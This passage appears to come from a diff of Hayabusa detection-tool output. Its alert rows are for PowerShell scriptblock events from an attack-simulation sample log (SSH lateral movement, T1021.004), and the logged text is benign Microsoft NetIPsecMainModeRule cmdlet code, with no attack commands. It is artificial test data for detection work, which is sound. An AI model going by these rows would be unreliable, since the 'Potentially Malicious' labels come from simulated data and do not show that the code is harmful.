Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Gr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Gr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"oup}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 